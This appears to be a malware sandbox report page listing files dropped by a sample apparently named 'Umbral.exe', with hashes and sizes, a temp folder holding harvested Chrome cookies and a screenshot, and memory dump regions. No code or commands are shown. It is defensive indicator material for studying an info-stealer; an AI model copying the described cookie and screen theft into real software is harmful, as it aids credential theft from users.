C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2984662ba3f86d7fcf26758b5b76754d

SHA1
bc2a43ffd898222ee84406313f3834f226928379

SHA256
f0815f797b0c1829745dd65985f28d459688f91ceb2f3d76fed2d4309589bcde

SHA512
a06251a7a14559ebf5627a3c6b03fda9ded1d4ee44991283c824ccf5011cdf67665696d2d9b23507cbb3e3b9943b9e9f79ef28d3657eb61fb99920225417ab11

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
522b7b1f178db884b72cc2f9a110faed

SHA1
933de1e71986d4c4547afd900c6b39bcdfda44fc

SHA256
032a3660ba5c8a6b2936b412407bba08383d7f50f3db5c2a8f646472501f7583

SHA512
d6592a2cb8a763fde5241828ee1027382524a2157bc60b3d7376a603351f714c04e10cefcff7d89a0ea945ed4c34f545478d0cdbd3b6d4d68a97221070fb0993

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
8fe70e63c44ca0ecd48b0180321927d3

SHA1
1419bf270210e065da1a4a36ef0d7f88ca89ee04

SHA256
f748e385e9b3b1eed95616ddc565f705187c5a9f5cc6a5e5ac132e43eb681eb2

SHA512
b01393a29399d9415c7247bcd309c44487ad8ffacb91fac34900d34a32d01fb5ef21492ae5573457015ee5f598901d85f99f2ba51da40c8b2285ae84bc7c6c61

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
15dde0683cd1ca19785d7262f554ba93

SHA1
d039c577e438546d10ac64837b05da480d06bf69

SHA256
d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961

SHA512
57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
34f595487e6bfd1d11c7de88ee50356a

SHA1
4caad088c15766cc0fa1f42009260e9a02f953bb

SHA256
0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d

SHA512
10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
ce4540390cc4841c8973eb5a3e9f4f7d

SHA1
2293f30a6f4c9538bc5b06606c10a50ab4ecef8e

SHA256
e834e1da338b9644d538cefd70176768816da2556939c1255d386931bd085105

SHA512
2a3e466cb5a81d2b65256053b768a98321eb3e65ff46353eefc9864f14a391748116f050e7482ddd73a51575bf0a6fc5c673023dade62dbd8b174442bae1cc6b

Download Submit
C:\Users\Admin\AppData\Local\Temp\K0QIwBUg95gMq4J\Browsers\Cookies\Chrome Cookies.txt

Filesize
260B

MD5
2be26a3e1fe2dc54b583cd20082a9410

SHA1
55cc5d9f39038d3cd0a5f97ef323b69458d85b4b

SHA256
87fcde6f89a824278451b7633a8c42d6f4a9bb8d8d05cd1c4f5c6992538a3ad2

SHA512
b804aa804b110a6c0b4f40439df6f2b33a21158ea806085dd9b4657de1c3abbf20a9d9cb43c6bc7ae5633894aeb85f368a8d2b7a184792956c7611ee8f5d0ea0

Download Submit
C:\Users\Admin\AppData\Local\Temp\K0QIwBUg95gMq4J\Display\Display.png

Filesize
427KB

MD5
d9f5572b1e371199171107d06c488614

SHA1
4773debeca85b6efe36874901e5b693eeb034aff

SHA256
66c13a21fd21eaaf8928b82a02c024ebfd14ca77c71655951b98466d56140788

SHA512
efdec6a8b00a6578ad78605615cce59f0feb09cc1013a9173a99e5456449c39881b936de39ed45252d68049f0ad80ce11d9151c880f7a50bb5eb1d2aadf1da43

Download Submit
C:\Users\Admin\AppData\Local\Temp\U91g2jYgtbUE1aD

Filesize
40KB

MD5
a182561a527f929489bf4b8f74f65cd7

SHA1
8cd6866594759711ea1836e86a5b7ca64ee8911f

SHA256
42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

SHA512
9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

Download Submit
C:\Users\Admin\AppData\Local\Temp\U91g2jYgtbUE1aD

Filesize
20KB

MD5
30d733630e41857f2b826af9ab9a7ffd

SHA1
7d36f62a4e3b5354bcb2b69380038d34ea5d4c60

SHA256
5296f3a0b539c2e54697113ba8f74c2982cbcd66e61550ce1931a6f88dd2b62a

SHA512
25a1ec0cdf9f8ba80631bd527f865afd8e86327c7bf454fe77fd05c353ade237661263f8d5e15a518e09e02cf4ba3337cacaf3e6369df44f73555f79ecaeced8

Download Submit
C:\Users\Admin\AppData\Local\Temp\U91g2jYgtbUE1aD

Filesize
20KB

MD5
49693267e0adbcd119f9f5e02adf3a80

SHA1
3ba3d7f89b8ad195ca82c92737e960e1f2b349df

SHA256
d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f

SHA512
b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Umbral.exe

Filesize
231KB

MD5
6a49712eb982ebbe74ae535f0efd2b7d

SHA1
2555a30e93f1bb22fdd6a612e561e5d738c8a65a

SHA256
8ca16b5d55198101652190132fb9ae25c9094180c4c3dc026f86bd96e67978aa

SHA512
0320526b3170cd69b90798d74dc8ec40e298332cf64830d9a954002c7b6efb30ab3b7aa1c673e00d77ada449342fab830d94d9c4f63f1cee50f7337931473a10

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rspkfkwt.mrz.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\elXUGcpA24RWhmi

Filesize
48KB

MD5
349e6eb110e34a08924d92f6b334801d

SHA1
bdfb289daff51890cc71697b6322aa4b35ec9169

SHA256
c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a

SHA512
2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

Download Submit
memory/712-787-0x0000000002360000-0x00000000023C2000-memory.dmp

Filesize
392KB

Download
memory/3100-613-0x0000000001180000-0x00000000011E2000-memory.dmp

Filesize
392KB

Download
memory/3152-18-0x00007FFBE93A0000-0x00007FFBE9E61000-memory.dmp

Filesize
10.8MB

Download
memory/3152-8-0x000002C2FB620000-0x000002C2FB642000-memory.dmp

Filesize
136KB

Download
memory/3152-13-0x00007FFBE93A0000-0x00007FFBE9E61000-memory.dmp

Filesize
10.8MB

Download
memory/3152-14-0x00007FFBE93A0000-0x00007FFBE9E61000-memory.dmp

Filesize
10.8MB

Download
memory/3152-15-0x00007FFBE93A0000-0x00007FFBE9E61000-memory.dmp

Filesize
10.8MB

Download
memory/3772-26-0x0000000001560000-0x00000000015C2000-memory.dmp

Filesize
392KB

Download
memory/3836-1027-0x0000000002910000-0x0000000002972000-memory.dmp

Filesize
392KB

Download
memory/4396-652-0x0000000002850000-0x00000000028B2000-memory.dmp

Filesize
392KB

Download
memory/4548-255-0x00000000011A0000-0x0000000001202000-memory.dmp

Filesize
392KB

Download
memory/4752-19-0x00007FFBE93A0000-0x00007FFBE9E61000-memory.dmp

Filesize
10.8MB

Download
memory/4752-0-0x00007FFBE93A3000-0x00007FFBE93A5000-memory.dmp

Filesize
8KB

Download
memory/4752-46-0x00007FFBE93A0000-0x00007FFBE9E61000-memory.dmp

Filesize
10.8MB

Download
memory/4752-2-0x000000001B3D0000-0x000000001B432000-memory.dmp

Filesize
392KB

Download
memory/4752-1-0x00000000008E0000-0x0000000000944000-memory.dmp

Filesize
400KB

Download
memory/4968-359-0x00000000013F0000-0x0000000001452000-memory.dmp

Filesize
392KB

Download
memory/5080-96-0x00000235FFBD0000-0x00000235FFC20000-memory.dmp

Filesize
320KB

Download
memory/5080-45-0x00000235E5400000-0x00000235E5440000-memory.dmp

Filesize
256KB

Download
memory/5080-156-0x00000235E7070000-0x00000235E707A000-memory.dmp

Filesize
40KB

Download
memory/5080-157-0x00000235FFB10000-0x00000235FFB22000-memory.dmp

Filesize
72KB

Download
memory/5080-97-0x00000235FFAD0000-0x00000235FFAEE000-memory.dmp

Filesize
120KB

Download
memory/5080-95-0x00000235FFB50000-0x00000235FFBC6000-memory.dmp

Filesize
472KB

Download
memory/5108-403-0x00000000030F0000-0x0000000003152000-memory.dmp

Filesize
392KB

Download